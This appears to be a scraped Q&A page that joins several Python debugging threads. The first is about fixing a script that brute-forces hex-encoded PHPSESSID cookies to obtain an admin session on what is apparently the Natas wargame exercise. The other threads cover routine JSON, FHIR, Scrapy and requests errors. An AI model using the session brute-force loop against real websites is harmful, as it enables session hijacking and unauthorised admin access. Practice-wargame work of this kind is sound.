I am trying to bruteforce a session via sending random cookies until the correct cookie gives me an admin session. I am using python 3.6 on Windows 10.
The cookie I want to use is PHPSESSID and I have set it to a hex encoded string consisting of "#-admin". The website gives a random PHPSESSID that is hex encoded, but only the number changes ('-admin' is consistent after every refresh). The source code maxes out the number to 640 hence the range.
The code is below:
for x in range(1,641):
if x % 10 == 0:
print (str(x) + ' Sessions Tested')
cookies = dict(PHPSESSID=(binascii.hexlify(str(x).encode('ascii')+b'-admin')))
r = requests.get(target, cookies=cookies)
if r.text.find(trueStr) != -1:
print ('Got it!')
I receive the following error after running the script on windows:
Traceback (most recent call last):
File "natas19.py", line 14, in <module>
r = requests.get(target, cookies=cookies)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\api.py", line 72, in get
return request('get', url, params=params, **kwargs)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\api.py", line 58, in request
return session.request(method=method, url=url, **kwargs)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\sessions.py", line 494, in request
prep = self.prepare_request(req)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\sessions.py", line 415, in prepare_request
cookies = cookiejar_from_dict(cookies)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\cookies.py", line 518, in cookiejar_from_dict
cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\cookies.py", line 345, in set_cookie
if hasattr(cookie.value, 'startswith') and cookie.value.startswith('"') and cookie.value.endswith('"'):
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
I have no idea where to start. I followed the documentation for python requests. Any suggestions on where to look would be greatly appreciated.
Cookie values must be str objects, but binascii.hexlify() returns a bytes object:
>>> import binascii
>>> x = 1
>>> binascii.hexlify(str(x).encode('ascii')+b'-admin')
b'312d61646d696e'
Decode that first:
cookies = {
'PHPSESSID': binascii.hexlify(b'%d-admin' % x).decode('ascii')
}
In your example, cookies is a dict set by:
dict(PHPSESSID=(binascii.hexlify(str(x).encode('ascii') + b'-admin')))
If you break up the steps of that one-liner, you'll see the problem:
>>> binascii.hexlify(str(x).encode('ascii') + b'-admin')
b'312d61646d696e'
>>> b'312d61646d696e'.startswith('3')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
You're performing a bytes operation with a str first arg. Since it's the requests package managing your cookies, convert the value to a str before setting PHPSESSID.
for x in range(1,641):
if x % 10 == 0:
print (str(x) + ' Sessions Tested')
b_sess_id = binascii.hexlify(str(x).encode('ascii')+b'-admin'))
cookies = dict(PHPSESSID=b_sess_id.decode())
r = requests.get(target, cookies=cookies)
if r.text.find(trueStr) != -1:
print ('Got it!')
Related
This question already has answers here:
HTTP requests and JSON parsing in Python [duplicate]
(8 answers)
Closed 8 months ago.
I am trying to iterate trough data from API and send them to my server but I am getting: TypeError: 'int' object is not iterable. Any idea how to solve it ?
Code for data source"
response = requests.get('https://jsonplaceholder.typicode.com/posts')
data = response.content
Code for iteration (BASE is variable for IP):
for i in range(len(data)):
response = requests.put(BASE + "status/" + str(i), data[i])
print(response.json())
Full Error:
Traceback (most recent call last):
File "restApi/test.py", line 20, in <module>
response = requests.put(BASE + "status/" + str(i), data[i])
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/requests/api.py", line 130, in put
return request("put", url, data=data, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/requests/adapters.py", line 523, in send
for i in request.body:
TypeError: 'int' object is not iterable
The problem is that you are using the content directly. You need to parse it before use it:
response = requests.get('https://jsonplaceholder.typicode.com/posts')
data = response.json()
for i in range(len(data)):
response = print("status/" + str(i), data[i])
I set up a try catch in my code, but it appears that my exception was not correct because it did not seem to catch it.
I am using an exception from a module, and perhaps I didn't import it correctly? Here is my code:
import logging
import fhirclient.models.bundle as b
from fhirclient.server import FHIRUnauthorizedException
logging.disable(logging.WARNING)
def get_all_resources(resource, struct, smart):
'''Perform a search on a resource type and get all resources entries from all retunred bundles.\n
This function takes all paginated bundles into consideration.'''
if smart.ready == False:
smart.reauthorize
search = resource.where(struct)
bundle = search.perform(smart.server)
resources = [entry.resource for entry in bundle.entry or []]
next_url = _get_next_url(bundle.link)
while next_url != None:
try:
json_dict = smart.server.request_json(next_url)
except FHIRUnauthorizedException:
smart.reauthorize
continue
bundle = b.Bundle(json_dict)
resources += [entry.resource for entry in bundle.entry or []]
next_url = _get_next_url(bundle.link)
return resources
Now when i ran the code I got the following error:
Traceback (most recent call last):
File "code.py", line 79, in <module>
main()
File "code.py", line 42, in main
reports = get_all_resources(dr.DiagnosticReport, search, smart)
File "somepath/fhir_tools/resource.py", line 23, in get_all_resources
json_dict = smart.server.request_json(next_url)
File "/usr/local/lib/python3.6/dist-packages/fhirclient/server.py", line 153, in request_json
res = self._get(path, headers, nosign)
File "/usr/local/lib/python3.6/dist-packages/fhirclient/server.py", line 181, in _get
self.raise_for_status(res)
File "/usr/local/lib/python3.6/dist-packages/fhirclient/server.py", line 256, in raise_for_status
raise FHIRUnauthorizedException(response)
server.FHIRUnauthorizedException: <Response [401]>
Shouldn't my exception catch this?
I have a scrapy script that works locally, but when I deploy it to Scrapinghub, it's giving all errors. Upon debugging, the error is coming from Yielding the item.
This is the error I get.
ERROR [scrapy.utils.signal] Error caught on signal handler: <bound method ?.item_scraped of <sh_scrapy.extension.HubstorageExtension object at 0x7fd39e6141d0>> Less
Traceback (most recent call last):
File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 150, in maybeDeferred
result = f(*args, **kw)
File "/usr/local/lib/python2.7/site-packages/pydispatch/robustapply.py", line 55, in robustApply
return receiver(*arguments, **named)
File "/usr/local/lib/python2.7/site-packages/sh_scrapy/extension.py", line 45, in item_scraped
item = self.exporter.export_item(item)
File "/usr/local/lib/python2.7/site-packages/scrapy/exporters.py", line 304, in export_item
result = dict(self._get_serialized_fields(item))
File "/usr/local/lib/python2.7/site-packages/scrapy/exporters.py", line 75, in _get_serialized_fields
value = self.serialize_field(field, field_name, item[field_name])
File "/usr/local/lib/python2.7/site-packages/scrapy/exporters.py", line 284, in serialize_field
return serializer(value)
File "/usr/local/lib/python2.7/site-packages/scrapy/exporters.py", line 290, in _serialize_value
return dict(self._serialize_dict(value))
File "/usr/local/lib/python2.7/site-packages/scrapy/exporters.py", line 300, in _serialize_dict
key = to_bytes(key) if self.binary else key
File "/usr/local/lib/python2.7/site-packages/scrapy/utils/python.py", line 117, in to_bytes
'object, got %s' % type(text).__name__)
TypeError: to_bytes must receive a unicode, str or bytes object, got int
It doesn't specify the field with issues, but by process of elimination, I came to realize it's this part of the code:
try:
item["media"] = {}
media_index = 0
media_content = response.xpath("//audio/source/#src").extract_first()
if media_content is not None:
item["media"][media_index] = {}
preview = item["media"][media_index]
preview["Media URL"] = media_content
preview["Media Type"] = "Audio"
media_index += 1
except IndexError:
print "Index error for media " + item["asset_url"]
I cleared some parts up to make it easier to tackle, but basically this part is the issue. Something it doesn't like about the item media.
I'm beginner in both Python and Scrapy. So sorry if this turns out to be silly basic Python mistake. Any idea?
EDIT: So after getting the answer from ThunderMind, the solution was to simply do str(media_index) for key
Yeah, right here:
item["media"][media_index] = {}
media_index is a mutable. and Keys can't be mutable.
Read Python dict, to know what should be used as keys.
So I have been trying to use base64 to decode a value and then be able to use those decoded strings to print out each for themselves.
Basically my decoded base64 is:
{
"trailerColor": "FF0017",
"complete": 59,
"bounds": [
25,
65,
62,
5
],
"Stamina": 0,
"cardId": "d4fc5458-3481-4ce6-be32-acd03c2cfd16",
}
Im using this code which gets the metadata that I wish and then convert it into a UTF-8 basically with the code below.
resp = requests.get(url, headers=headers, json=json, timeout=6)
getmetadata = resp.json()['objects'][1]['metadata']
newdata = base64.b64decode(getmetadata).decode('UTF-8')
print(newdata)
However usually if I did newdata['trailerColor'] it should be able to print out only trailerColor if I do that but what i'm getting for error is:
TypeError: string indices must be integers
How can I solve this by printing whatever I want out through that json?
EDIT:
Process Process-1:
Traceback (most recent call last):
File "C:\Users\AppData\Local\Programs\Python\Python36\lib\multiprocessing\process.py", line 249, in _bootstrap
self.run()
File "C:\Users\AppData\Local\Programs\Python\Python36\lib\multiprocessing\process.py", line 93, in run
self._target(*self._args, **self._kwargs)
File "C:\Users\TEST.py", line 194, in script
print(newdata['complete'])
TypeError: string indices must be integers
resp = requests.get(url, headers=headers, json=json, timeout=6)
getmetadata = resp.json()['objects'][1]['metadata']
newdata = base64.b64decode(getmetadata).decode('UTF-8')
data = json.loads(newdata)
print(data['complete'])
base64.b64decode(str).decode(str) returns a string str. If that string should be json then you can use json.loads to transform the string str to a dict where you can get a single value by it's key.
Python cannot get a simple JSON object via HTTP due to cannot concatenate 'str' and 'tuple' objects while getting a JSON object error. However, the same script works without any issues on a different machine with the same setup (OS, python version, python modules, etc.)
Version used: python-2.6.6-52.el6.x86_64
OS: RHEL 6.6
Script:
#!/usr/bin/env python
import requests
import json
def main():
f = requests.get("http://peslog001.abc.local:9200/_cluster/health")
health = f.json()
print health
if __name__ == "__main__":
main()
Output:
./gettest.py
Traceback (most recent call last):
File "./gettest.py", line 12, in <module>
main()
File "./gettest.py", line 7, in main
f = requests.get("http://peslog001.abc.local:9200/_cluster/health")
File "/usr/lib/python2.6/site-packages/requests/api.py", line 55, in get
return request('get', url, **kwargs)
File "/usr/lib/python2.6/site-packages/requests/api.py", line 44, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python2.6/site-packages/requests/sessions.py", line 279, in request
resp = self.send(prep, stream=stream, timeout=timeout, verify=verify, cert=cert, proxies=proxies)
File "/usr/lib/python2.6/site-packages/requests/sessions.py", line 374, in send
r = adapter.send(request, **kwargs)
File "/usr/lib/python2.6/site-packages/requests/adapters.py", line 219, in send
r = self.build_response(request, resp)
File "/usr/lib/python2.6/site-packages/requests/adapters.py", line 96, in build_response
response.encoding = get_encoding_from_headers(response.headers)
File "/usr/lib/python2.6/site-packages/requests/utils.py", line 281, in get_encoding_from_headers
content_type, params = cgi.parse_header(content_type)
File "/usr/lib64/python2.6/cgi.py", line 310, in parse_header
parts = _parseparam(';' + line)
TypeError: cannot concatenate 'str' and 'tuple' objects
Output of the same script on the second machine:
./gettest.py
{u'status': u'green', u'number_of_nodes': 7, u'unassigned_shards': 0, u'timed_out': False, u'active_primary_shards': 1441, u'cluster_name': u'elasticsearch', u'relocating_shards': 0, u'active_shards': 2882, u'initializing_shards': 0, u'number_of_data_nodes': 4}
Any ideas why this is happening?
Thank you in advance.
It reads from file OK, it just seems to be having a problem with the response it is getting from the URL:
#!/usr/bin/env python
import requests
import json
def main():
f = open("/etc/zabbix/testjson").read()
health = json.loads(f)
print health
if __name__ == "__main__":
main()
Output:
# ./gettest2.py
{u'status': u'green', u'number_of_nodes': 7, u'unassigned_shards': 0, u'timed_out': False, u'active_primary_shards': 1441, u'cluster_name': u'elasticsearch', u'relocating_shards': 0, u'active_shards': 2882, u'initializing_shards': 0, u'number_of_data_nodes': 4}
No problems with getting the response with CURL:
# curl http://peslog001.abc.local:9200/_cluster/health
{"cluster_name":"elasticsearch","status":"green","timed_out":false,"number_of_nodes":7,"number_of_data_nodes":4,"active_primary_shards":1441,"active_shards":2882,"relocating_shards":0,"initializing_shards":0,"unassigned_shards":0}
....
curl -s -D - -o /dev/null peslog001.abc.local:9200/_cluster/health
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 230
utils.py debugging result:
> /usr/lib/python2.6/site-packages/requests/utils.py(277)get_encoding_from_headers()
-> content_type = headers.get('content-type')
(Pdb) n
> /usr/lib/python2.6/site-packages/requests/utils.py(278)get_encoding_from_headers()
-> print content_type
(Pdb) n
('content-type', 'application/json; charset=UTF-8')
> /usr/lib/python2.6/site-packages/requests/utils.py(279)get_encoding_from_headers()
-> if not content_type:
(Pdb)
> /usr/lib/python2.6/site-packages/requests/utils.py(282)get_encoding_from_headers()
-> content_type, params = cgi.parse_header(content_type)
(Pdb)
TypeError: "cannot concatenate 'str' and 'tuple' objects"
Output of debugging on a server where the script works shows that content_type is different:
> /usr/lib/python2.6/site-packages/requests/utils.py(277)get_encoding_from_headers()
-> content_type = headers.get('content-type')
(Pdb) n
> /usr/lib/python2.6/site-packages/requests/utils.py(278)get_encoding_from_headers()
-> print content_type
(Pdb) n
application/json; charset=UTF-8
> /usr/lib/python2.6/site-packages/requests/utils.py(279)get_encoding_from_headers()
-> if not content_type:
(Pdb) n
> /usr/lib/python2.6/site-packages/requests/utils.py(282)get_encoding_from_headers()
-> content_type, params = cgi.parse_header(content_type)
(Pdb) n
Workaround (very bad one indeed but I don't use phyton for anything else so I can live with that):
added the following line to utils.py get_encoding_from_headers()
content_type = "application/json; charset=UTF-8"